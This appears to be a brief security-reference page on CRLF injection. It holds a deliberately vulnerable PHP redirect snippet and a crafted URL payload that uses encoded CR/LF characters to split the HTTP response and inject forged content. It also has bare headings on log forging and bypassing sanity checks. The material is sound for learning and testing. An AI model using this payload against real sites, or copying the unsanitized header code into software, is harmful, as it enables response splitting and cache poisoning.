CRLF Injection
Carriage Return Line Feed (CRLF) Injection Attack
Exploitation
HTTP Response Splitting
<?php
$new_url = $_GET["url"];
header("Location: " . $new_url);
?>http://remote.com/index.php?url=http://remote.com/%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AeSomeContentLog Forging
Bypassing sanity checks
Last updated